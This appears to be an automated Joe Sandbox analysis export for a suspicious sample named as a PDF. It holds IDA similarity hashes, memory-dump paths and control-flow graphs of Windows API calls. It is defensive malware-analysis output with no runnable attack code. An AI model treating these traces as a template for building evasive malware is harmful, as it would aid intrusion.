                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3f7a23489e487dfa334a5cc8dcb4ddbb77d9f30c5b8749342b6435131613779b
                                                                                                                                                                                • Instruction ID: a950479ed9a568cca424ee4f61ab99e1604a47d66331d94ece9215c11db7017a
                                                                                                                                                                                • Opcode Fuzzy Hash: 3f7a23489e487dfa334a5cc8dcb4ddbb77d9f30c5b8749342b6435131613779b
                                                                                                                                                                                • Instruction Fuzzy Hash: C5C19F74E01218CFDB14DFA5C984BADBBB2FB88300F1090A9D819AB364DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7853db122d73df6376d83e24735daaebf657c22cc86cf6f087d1b97e2e9fd0ce
                                                                                                                                                                                • Instruction ID: d0d3c657336d5311acaa511d1c3ae904f6bfba77d57d0799a9106b49d02e1d2d
                                                                                                                                                                                • Opcode Fuzzy Hash: 7853db122d73df6376d83e24735daaebf657c22cc86cf6f087d1b97e2e9fd0ce
                                                                                                                                                                                • Instruction Fuzzy Hash: C9C18F74E01218CFDB14DFA5D994BADBBB2FB89300F1090A9D809AB364DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a3f853f2d7e39cd1bf3c6ec011851bf82f7b13050ea7d9cd8fa6c800a303b984
                                                                                                                                                                                • Instruction ID: 829c98622a44784ce8d86aeb858d4225e6db95b447f8b195e42e337a8533f813
                                                                                                                                                                                • Opcode Fuzzy Hash: a3f853f2d7e39cd1bf3c6ec011851bf82f7b13050ea7d9cd8fa6c800a303b984
                                                                                                                                                                                • Instruction Fuzzy Hash: 58C18174E01218CFDB14DFA5D994BADBBB2FB88300F1091A9D809AB354DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4636faf98303c255e4bd3bded38682a74ee3853d8d2c1755fba18a2fc5a1ee62
                                                                                                                                                                                • Instruction ID: c488083b872ae0b58d1e3f2851fe291a7276e2b7f791cd58982b4a2b66e792af
                                                                                                                                                                                • Opcode Fuzzy Hash: 4636faf98303c255e4bd3bded38682a74ee3853d8d2c1755fba18a2fc5a1ee62
                                                                                                                                                                                • Instruction Fuzzy Hash: E7C18F74E01218CFDB14DFA5D994BADBBB2FB88300F1091A9D809AB364DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ae46038015f2b5020b7098fe273276904f2054c8497f12f11abd93b050c0da25
                                                                                                                                                                                • Instruction ID: 83393a636e6a023abb8e4131dba20483ba066ed97ced4663fda32d46ae97c3fa
                                                                                                                                                                                • Opcode Fuzzy Hash: ae46038015f2b5020b7098fe273276904f2054c8497f12f11abd93b050c0da25
                                                                                                                                                                                • Instruction Fuzzy Hash: C4C19F74E01218CFDB14DFA5C984BADBBB2FB88300F1091A9D809AB364DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 4d501d92a68bd79f4b0314d93162ac03dbedd93663da37e0cb6696d337e29f46
                                                                                                                                                                                • Instruction ID: 4048bf14ad1ca046b30dfa25f54760944984f09ff353e09d58c29afe7aa97612
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d501d92a68bd79f4b0314d93162ac03dbedd93663da37e0cb6696d337e29f46
                                                                                                                                                                                • Instruction Fuzzy Hash: 1CC18074E01218CFDB14DFA5D994BADBBB2FB88300F2091A9D809AB354DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8539aee422d58a3f611aaabef0ea06849d8d660ca27268573fc197694e63db97
                                                                                                                                                                                • Instruction ID: 8a246f7f9416de57df936ce43a3fc9963c86fb4e138beefda1dc0a356a83ad3e
                                                                                                                                                                                • Opcode Fuzzy Hash: 8539aee422d58a3f611aaabef0ea06849d8d660ca27268573fc197694e63db97
                                                                                                                                                                                • Instruction Fuzzy Hash: BCC18D74E01218CFDB14DFA5D994BADBBB2FB88300F1091A9D809AB364DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 19f1722dc40997ed9357318d3f276ac2a834f475a3dd885d594d6bc42285d61a
                                                                                                                                                                                • Instruction ID: d048a95dcf2b65058a4ebd37def18e0e270f315498ad9b836a304354bf84c469
                                                                                                                                                                                • Opcode Fuzzy Hash: 19f1722dc40997ed9357318d3f276ac2a834f475a3dd885d594d6bc42285d61a
                                                                                                                                                                                • Instruction Fuzzy Hash: 87C19E74E01218CFDB14DFA5D994BADBBB2FB88300F1090A9D819AB364DB359E85CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f6f4da9822d0a22a3d8883526b243c127d59b5e3b0ecc9b7657b7006aa4587c0
                                                                                                                                                                                • Instruction ID: 263b643ae6d5ec41e14e896494f02beac17b1fafe5f105349ef12a61864d0fcf
                                                                                                                                                                                • Opcode Fuzzy Hash: f6f4da9822d0a22a3d8883526b243c127d59b5e3b0ecc9b7657b7006aa4587c0
                                                                                                                                                                                • Instruction Fuzzy Hash: F9A1AC74A01228CFDB64DF65C994BAABBB2FB49300F1085E9D40DA7250DB35AE81CF51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3b2004a02d97efa6c50e2f1c5e35004c128df16f91df13917599702b3a906270
                                                                                                                                                                                • Instruction ID: 99b2f28b9b1afff29b65d7999cb487e1ee10518c0283afbce3a60577fae59f01
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b2004a02d97efa6c50e2f1c5e35004c128df16f91df13917599702b3a906270
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C512570D01228CBDB04DFA9D4847EDBBB2FFA9308F24D529D424AB294DB759881CF64
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c853c50b046829d03d25de4acf9bc99395c47441c7a451741b3ec4cff8f4c38f
                                                                                                                                                                                • Instruction ID: fb588cae6626107a2e4e12e2bbd0f055087fc3a8b711be84dddade54970a11fe
                                                                                                                                                                                • Opcode Fuzzy Hash: c853c50b046829d03d25de4acf9bc99395c47441c7a451741b3ec4cff8f4c38f
                                                                                                                                                                                • Instruction Fuzzy Hash: 86511370D01228CBDB00DFA8D484BEDBBB2FF69308F249919D425AB294D775A881CF64
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e7fcfded1a4ec0b9ec49e059069d3c4015522ab405a5e8968ac4544cadd6ddb6
                                                                                                                                                                                • Instruction ID: 733484cfa86f7a6eaf2aa3ca832f2c963da4a1961c2111369768499805aeae37
                                                                                                                                                                                • Opcode Fuzzy Hash: e7fcfded1a4ec0b9ec49e059069d3c4015522ab405a5e8968ac4544cadd6ddb6
                                                                                                                                                                                • Instruction Fuzzy Hash: BD519134A41229CFCB65DF24C854BAAB7B2FB49301F5099E9D50EA7350DB35AE81CF50
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                                                                • API String ID: 0-3001612457
                                                                                                                                                                                • Opcode ID: d8fb7edd2cf9cbe9332ed0ff5f4c430c79c50934970ebc0b06cbd91ea5ba9147
                                                                                                                                                                                • Instruction ID: 42a55a507ad373a9f5850c4b33587ff3ef97691549b8f0a70a10310d43ed9c75
                                                                                                                                                                                • Opcode Fuzzy Hash: d8fb7edd2cf9cbe9332ed0ff5f4c430c79c50934970ebc0b06cbd91ea5ba9147
                                                                                                                                                                                • Instruction Fuzzy Hash: 6401DF31B40324CFCB248E2CC5449A537EBAFACA68725446AE9A6CF3B5DE31DC818740

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:9.5%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:86
                                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                                execution_graph 15747 176ac50 15748 176ac51 15747->15748 15752 176ad37 15748->15752 15757 176ad48 15748->15757 15749 176ac5f 15754 176ad48 15752->15754 15753 176ad7c 15753->15749 15754->15753 15755 176af80 GetModuleHandleW 15754->15755 15756 176afad 15755->15756 15756->15749 15758 176ad49 15757->15758 15759 176ad7c 15758->15759 15760 176af80 GetModuleHandleW 15758->15760 15759->15749 15761 176afad 15760->15761 15761->15749 15762 176d620 DuplicateHandle 15763 176d6b6 15762->15763 15764 1764668 15765 176467a 15764->15765 15766 1764686 15765->15766 15770 1764779 15765->15770 15775 1763e10 15766->15775 15768 17646a5 15771 176479d 15770->15771 15779 1764878 15771->15779 15783 1764888 15771->15783 15776 1763e1b 15775->15776 15791 1765c64 15776->15791 15778 1766fcf 15778->15768 15781 17648af 15779->15781 15780 176498c 15780->15780 15781->15780 15787 1764248 15781->15787 15785 17648af 15783->15785 15784 176498c 15784->15784 15785->15784 15786 1764248 CreateActCtxA 15785->15786 15786->15784 15788 1765918 CreateActCtxA 15787->15788 15790 17659db 15788->15790 15792 1765c6f 15791->15792 15795 1765c84 15792->15795 15794 1767085 15794->15778 15796 1765c8f 15795->15796 15799 1765cb4 15796->15799 15798 1767162 15798->15794 15800 1765cbf 15799->15800 15803 1765ce4 15800->15803 15802 1767265 15802->15798 15805 1765cef 15803->15805 15804 17685a9 15804->15802 15805->15804 15808 176cd00 15805->15808 15813 176cd0f 15805->15813 15809 176cd69 15808->15809 15810 176cd98 15809->15810 15818 176cec0 15809->15818 15822 176ceb1 15809->15822 15810->15804 15814 176cd31 15813->15814 15815 176cd55 15814->15815 15816 176cec0 2 API calls 15814->15816 15817 176ceb1 2 API calls 15814->15817 15815->15804 15816->15815 15817->15815 15819 176cecd 15818->15819 15820 176cf07 15819->15820 15826 176b720 15819->15826 15820->15810 15823 176cecd 15822->15823 15824 176cf07 15823->15824 15825 176b720 2 API calls 15823->15825 15824->15810 15825->15824 15827 176b72b 15826->15827 15829 176dc18 15827->15829 15830 176d024 15827->15830 15829->15829 15831 176d02f 15830->15831 15832 1765ce4 2 API calls 15831->15832 15833 176dc87 15832->15833 15834 176dc96 15833->15834 15837 176dcf0 15833->15837 15841 176dd00 15833->15841 15834->15829 15838 176dd2e 15837->15838 15839 176ddfa KiUserCallbackDispatcher 15838->15839 15840 176ddff 15838->15840 15839->15840 15842 176dd2e 15841->15842 15843 176ddfa KiUserCallbackDispatcher 15842->15843 15844 176ddff 15842->15844 15843->15844 15845 176d3d8 15846 176d41e GetCurrentProcess 15845->15846 15848 176d470 GetCurrentThread 15846->15848 15849 176d469 15846->15849 15850 176d4a6 15848->15850 15851 176d4ad GetCurrentProcess 15848->15851 15849->15848 15850->15851 15854 176d4e3 15851->15854 15852 176d50b GetCurrentThreadId 15853 176d53c 15852->15853 15854->15852

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 296 176d3c9-176d467 GetCurrentProcess 300 176d470-176d4a4 GetCurrentThread 296->300 301 176d469-176d46f 296->301 302 176d4a6-176d4ac 300->302 303 176d4ad-176d4e1 GetCurrentProcess 300->303 301->300 302->303 304 176d4e3-176d4e9 303->304 305 176d4ea-176d505 call 176d5a8 303->305 304->305 309 176d50b-176d53a GetCurrentThreadId 305->309 310 176d543-176d5a5 309->310 311 176d53c-176d542 309->311 311->310
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0176D456
                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0176D493
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0176D4D0
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0176D529
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                • Opcode ID: f396558b796e0ce04f47e6413988ee3083ff22f09500be3d3517f59d6c9db1e6
                                                                                                                                                                                • Instruction ID: f683c8a0f752360c33693e18ba948545984e0861d62f2aced2bcc0f83746c381
                                                                                                                                                                                • Opcode Fuzzy Hash: f396558b796e0ce04f47e6413988ee3083ff22f09500be3d3517f59d6c9db1e6
                                                                                                                                                                                • Instruction Fuzzy Hash: DB5144B0A102498FDB14DFA9D548BDEBFF5BF48304F20846AE459A7360DB34A984CF65

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 318 176d3d8-176d467 GetCurrentProcess 322 176d470-176d4a4 GetCurrentThread 318->322 323 176d469-176d46f 318->323 324 176d4a6-176d4ac 322->324 325 176d4ad-176d4e1 GetCurrentProcess 322->325 323->322 324->325 326 176d4e3-176d4e9 325->326 327 176d4ea-176d505 call 176d5a8 325->327 326->327 331 176d50b-176d53a GetCurrentThreadId 327->331 332 176d543-176d5a5 331->332 333 176d53c-176d542 331->333 333->332
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0176D456
                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0176D493
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0176D4D0
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0176D529
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                • Opcode ID: 11fe2b56995d8e046298f5821924bca5db4600abc210c7e0471747d0662c5c50
                                                                                                                                                                                • Instruction ID: 8e736ac262e9826087c08612c6fde1ec5edbbec10bbc7863065ce60cfed74a08
                                                                                                                                                                                • Opcode Fuzzy Hash: 11fe2b56995d8e046298f5821924bca5db4600abc210c7e0471747d0662c5c50
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E5154B0A102098FDB14DFAAD548BDEFFF5BF48304F208469E459A7360DB34A984CB65

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 362 176ad48-176ad57 364 176ad83-176ad87 362->364 365 176ad59-176ad66 call 176a0a0 362->365 366 176ad9b-176addc 364->366 367 176ad89-176ad93 364->367 372 176ad7c 365->372 373 176ad68 365->373 374 176adde-176ade6 366->374 375 176ade9-176adf7 366->375 367->366 372->364 418 176ad6e call 176afe0 373->418 419 176ad6e call 176afd0 373->419 374->375 376 176ae1b-176ae1d 375->376 377 176adf9-176adfe 375->377 379 176ae20-176ae27 376->379 380 176ae00-176ae07 call 176a0ac 377->380 381 176ae09 377->381 378 176ad74-176ad76 378->372 382 176aeb8-176af78 378->382 383 176ae34-176ae3b 379->383 384 176ae29-176ae31 379->384 386 176ae0b-176ae19 380->386 381->386 413 176af80-176afab GetModuleHandleW 382->413 414 176af7a-176af7d 382->414 387 176ae3d-176ae45 383->387 388 176ae48-176ae4a call 176a0bc 383->388 384->383 386->379 387->388 392 176ae4f-176ae51 388->392 394 176ae53-176ae5b 392->394 395 176ae5e-176ae63 392->395 394->395 396 176ae65-176ae6c 395->396 397 176ae81-176ae8e 395->397 396->397 399 176ae6e-176ae7e call 176a0cc call 176a0dc 396->399 403 176ae90-176aeae 397->403 404 176aeb1-176aeb7 397->404 399->397 403->404 415 176afb4-176afc8 413->415 416 176afad-176afb3 413->416 414->413 416->415 418->378 419->378
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0176AF9E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                • Opcode ID: b1c39d201e3d4e5b65e7159eccebcced0900d2cf10bd2a5011774154378ce55f
                                                                                                                                                                                • Instruction ID: fde21664a666e9d63143843d9672d23b9c1318bcdccbec32d1825758aa20c78d
                                                                                                                                                                                • Opcode Fuzzy Hash: b1c39d201e3d4e5b65e7159eccebcced0900d2cf10bd2a5011774154378ce55f
                                                                                                                                                                                • Instruction Fuzzy Hash: FC714370A00B058FD724DF69C54575ABBF9FF88200F008A2DD98AE7B44DB75E846CB91

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 420 1764248-17659d9 CreateActCtxA 423 17659e2-1765a3c 420->423 424 17659db-17659e1 420->424 431 1765a3e-1765a41 423->431 432 1765a4b-1765a4f 423->432 424->423 431->432 433 1765a60 432->433 434 1765a51-1765a5d 432->434 436 1765a61 433->436 434->433 436->436
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 017659C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                • Opcode ID: 07cb4bbddced5dfb5d00025bcf886b1d547748cab3719d16b174a38a6140d8e4
                                                                                                                                                                                • Instruction ID: 86b4fcc8d383c39ea81c93cb9923fb2a506a47dc314dc6b1edae5d3c72fef2b8
                                                                                                                                                                                • Opcode Fuzzy Hash: 07cb4bbddced5dfb5d00025bcf886b1d547748cab3719d16b174a38a6140d8e4
                                                                                                                                                                                • Instruction Fuzzy Hash: 0E41D0B1D0071DDFDB24CFA9C884A9DBBF9BF49304F2480AAD408AB255DB756945CF90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 437 176590d-1765913 438 176591c-17659d9 CreateActCtxA 437->438 440 17659e2-1765a3c 438->440 441 17659db-17659e1 438->441 448 1765a3e-1765a41 440->448 449 1765a4b-1765a4f 440->449 441->440 448->449 450 1765a60 449->450 451 1765a51-1765a5d 449->451 453 1765a61 450->453 451->450 453->453
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 017659C9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                • Opcode ID: e4bf9a3265e8cab72d54619f03298175724a3417b5677bf03c0a707dcedc7bf4
                                                                                                                                                                                • Instruction ID: 5d9d78c04882d26823b114b28862f31074339ac35d8018f8d9d89bd6b58c56b2
                                                                                                                                                                                • Opcode Fuzzy Hash: e4bf9a3265e8cab72d54619f03298175724a3417b5677bf03c0a707dcedc7bf4
                                                                                                                                                                                • Instruction Fuzzy Hash: BB41E0B1D00719CFDB24CFA9C88478DBBF5BF49304F2480AAD418AB255DB756946CF90

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 459 176d620-176d6b4 DuplicateHandle 460 176d6b6-176d6bc 459->460 461 176d6bd-176d6da 459->461 460->461
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0176D6A7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: d791d7c4822b0fec7321b32c8b56f0b692b6c7399594fac0d887c59b72a3eaea
                                                                                                                                                                                • Instruction ID: 3761166dc5445fc0bb58ddfc8d805c83a297d4220ce5584afa7ab1bcbf553815
                                                                                                                                                                                • Opcode Fuzzy Hash: d791d7c4822b0fec7321b32c8b56f0b692b6c7399594fac0d887c59b72a3eaea
                                                                                                                                                                                • Instruction Fuzzy Hash: 8521E2B59002489FDB10CFAAD984ADEFFF8EB48320F14841AE958A7310D374A940CFA5

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 454 176d619-176d6b4 DuplicateHandle 455 176d6b6-176d6bc 454->455 456 176d6bd-176d6da 454->456 455->456
                                                                                                                                                                                APIs
                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0176D6A7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                • Opcode ID: ca2610b06dd981d15fb6ccaf7a8fcd74872fd64a1210c778897099b14a0c626f
                                                                                                                                                                                • Instruction ID: 1e320fef711c31246b23095a7273929a1a5b4ef05d2f3b43f33fabbf506a271f
                                                                                                                                                                                • Opcode Fuzzy Hash: ca2610b06dd981d15fb6ccaf7a8fcd74872fd64a1210c778897099b14a0c626f
                                                                                                                                                                                • Instruction Fuzzy Hash: B821E4B5900219DFDB10CF99D584AEEFBF4EB48314F14841AE958B7310D374A940CF65

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 464 176af38-176af78 465 176af80-176afab GetModuleHandleW 464->465 466 176af7a-176af7d 464->466 467 176afb4-176afc8 465->467 468 176afad-176afb3 465->468 466->465 468->467
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0176AF9E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.4131024328.0000000001760000.00000040.00000800.00020000.00000000.sdmp, Offset: 01760000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_1760000_audiomaximizer.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4139908857-0
